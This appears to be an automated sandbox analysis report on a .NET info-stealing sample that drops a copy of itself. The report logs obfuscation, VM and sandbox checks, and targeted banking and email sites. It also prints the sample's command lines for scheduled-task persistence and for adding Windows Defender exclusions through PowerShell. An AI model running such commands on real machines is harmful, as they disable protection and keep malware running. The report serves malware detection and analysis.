                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exe; Section loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exe; Section loaded: schannel.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exe; Section loaded: mskeyprotect.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exe; Section loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exe; Section loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exe; Section loaded: ncryptsslp.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exe; Section loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exe; Section loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exe; Section loaded: userenv.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exe; Section loaded: wbemcomn.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exe; Section loaded: amsi.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exe; Section loaded: ntmarta.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exe; Section loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exe; Section loaded: windowscodecs.dll
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                    Source: Window Recorder; Window detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exe; File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                    Source: RgIbrhxoEx.exe; Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: RgIbrhxoEx.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                    Data Obfuscation

                    Source: RgIbrhxoEx.exe, StatGrapher.cs; .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                    Source: LjGABleGAy.exe.0.dr, StatGrapher.cs; .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.RgIbrhxoEx.exe.5270000.5.raw.unpack, bg.cs; .Net Code: System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.RgIbrhxoEx.exe.5f40000.8.raw.unpack, A8wQQPxStWJpqrtu18.cs; .Net Code: mFUTmlPCn6 System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.RgIbrhxoEx.exe.40399e8.4.raw.unpack, A8wQQPxStWJpqrtu18.cs; .Net Code: mFUTmlPCn6 System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.RgIbrhxoEx.exe.3fe01c8.2.raw.unpack, A8wQQPxStWJpqrtu18.cs; .Net Code: mFUTmlPCn6 System.Reflection.Assembly.Load(byte[])
                    Source: RgIbrhxoEx.exe; Static PE information: section name: .text entropy: 7.9275615283647385
                    Source: LjGABleGAy.exe.0.dr; Static PE information: section name: .text entropy: 7.9275615283647385
                    Source: 0.2.RgIbrhxoEx.exe.5f40000.8.raw.unpack, 0.2.RgIbrhxoEx.exe.40399e8.4.raw.unpack, 0.2.RgIbrhxoEx.exe.3fe01c8.2.raw.unpack; High entropy of concatenated method names
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exe; File created: C:\Users\user\AppData\Roaming\LjGABleGAy.exe (dropped file)

                    Boot Survival

                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exe; Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LjGABleGAy" /XML "C:\Users\user\AppData\Local\Temp\tmp3B03.tmp"

                    Hooking and other Techniques for Hiding and Protection

                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: unknown; Network traffic detected: HTTP traffic on port 49706 -> 55615
                    Source: unknown; Network traffic detected: HTTP traffic on port 55615 -> 49706
                    Source: unknown; Network traffic detected: HTTP traffic on port 49708 -> 55615
                    Source: unknown; Network traffic detected: HTTP traffic on port 49709 -> 55615
                    Source: unknown; Network traffic detected: HTTP traffic on port 55615 -> 49709
                    Source: unknown; Network traffic detected: HTTP traffic on port 55615 -> 49708
                    Source: unknown; Network traffic detected: HTTP traffic on port 49711 -> 55615
                    Source: unknown; Network traffic detected: HTTP traffic on port 55615 -> 49711
                    Source: unknown; Network traffic detected: HTTP traffic on port 49718 -> 55615
                    Source: unknown; Network traffic detected: HTTP traffic on port 55615 -> 49718
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exe Process information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: Yara matchFile source: Process Memory Space: RgIbrhxoEx.exe PID: 5440, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: LjGABleGAy.exe PID: 1880, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeMemory allocated: F90000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeMemory allocated: 2DA0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeMemory allocated: 12D0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeMemory allocated: 6110000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeMemory allocated: 5FA0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeMemory allocated: 7210000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeMemory allocated: 8210000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeMemory allocated: 13C0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeMemory allocated: 30B0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeMemory allocated: 50B0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeMemory allocated: 1380000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeMemory allocated: 31E0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeMemory allocated: 3000000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeMemory allocated: 63A0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeMemory allocated: 73A0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeMemory allocated: 75E0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeMemory allocated: 85E0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeMemory allocated: 12D0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeMemory allocated: 2C90000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeMemory allocated: 4C90000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6201Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7727Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 363Jump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeWindow / User API: threadDelayed 2865Jump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeWindow / User API: threadDelayed 4936Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeWindow / User API: threadDelayed 1869
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeWindow / User API: threadDelayed 5751
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exe TID: 2164Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3788Thread sleep count: 6201 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4744Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1216Thread sleep count: 145 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3552Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6448Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6388Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exe TID: 7396Thread sleep time: -23980767295822402s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exe TID: 3812Thread sleep time: -30000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exe TID: 1272Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exe TID: 7196Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exe TID: 7740Thread sleep time: -23058430092136925s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exe TID: 7536Thread sleep time: -30000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exe TID: 7508Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeFile opened: C:\Users\user\AppData\Local\Temp\acrocef_low\NULLJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\NULLJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\NULLJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\AcrobatJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbxJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\AdobeJump to behavior
                    Source: tmp4D8.tmp.8.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                    Source: tmp4D8.tmp.8.drBinary or memory string: discord.comVMware20,11696428655f
                    Source: tmp4D8.tmp.8.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                    Source: tmp4D8.tmp.8.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                    Source: tmp4D8.tmp.8.drBinary or memory string: global block list test formVMware20,11696428655
                    Source: tmp4D8.tmp.8.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                    Source: tmp4D8.tmp.8.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                    Source: tmp4D8.tmp.8.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                    Source: tmp4D8.tmp.8.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                    Source: tmp4D8.tmp.8.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                    Source: tmp4D8.tmp.8.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                    Source: tmp4D8.tmp.8.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                    Source: tmp4D8.tmp.8.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                    Source: tmp4D8.tmp.8.drBinary or memory string: outlook.office365.comVMware20,11696428655t
                    Source: tmp4D8.tmp.8.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                    Source: RgIbrhxoEx.exe, 00000008.00000002.2243746245.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, LjGABleGAy.exe, 0000000E.00000002.2326375186.0000000000E10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: tmp4D8.tmp.8.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                    Source: tmp4D8.tmp.8.drBinary or memory string: outlook.office.comVMware20,11696428655s
                    Source: tmp4D8.tmp.8.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                    Source: tmp4D8.tmp.8.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
                    Source: tmp4D8.tmp.8.drBinary or memory string: AMC password management pageVMware20,11696428655
                    Source: tmp4D8.tmp.8.drBinary or memory string: tasks.office.comVMware20,11696428655o
                    Source: tmp4D8.tmp.8.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                    Source: tmp4D8.tmp.8.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                    Source: tmp4D8.tmp.8.drBinary or memory string: interactivebrokers.comVMware20,11696428655
                    Source: tmp4D8.tmp.8.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                    Source: tmp4D8.tmp.8.drBinary or memory string: dev.azure.comVMware20,11696428655j
                    Source: tmp4D8.tmp.8.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                    Source: tmp4D8.tmp.8.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                    Source: tmp4D8.tmp.8.drBinary or memory string: bankofamerica.comVMware20,11696428655x
                    Source: LjGABleGAy.exe, 0000000A.00000002.2215810861.00000000014A2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}v
                    Source: tmp4D8.tmp.8.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                    Source: tmp4D8.tmp.8.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RgIbrhxoEx.exe"
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\LjGABleGAy.exe"
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeMemory written: C:\Users\user\Desktop\RgIbrhxoEx.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeMemory written: C:\Users\user\AppData\Roaming\LjGABleGAy.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LjGABleGAy" /XML "C:\Users\user\AppData\Local\Temp\tmp3B03.tmp"Jump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess created: C:\Users\user\Desktop\RgIbrhxoEx.exe "C:\Users\user\Desktop\RgIbrhxoEx.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LjGABleGAy" /XML "C:\Users\user\AppData\Local\Temp\tmp5E88.tmp"
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess created: C:\Users\user\AppData\Roaming\LjGABleGAy.exe "C:\Users\user\AppData\Roaming\LjGABleGAy.exe"
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeQueries volume information: C:\Users\user\Desktop\RgIbrhxoEx.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeQueries volume information: C:\Users\user\AppData\Roaming\LjGABleGAy.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
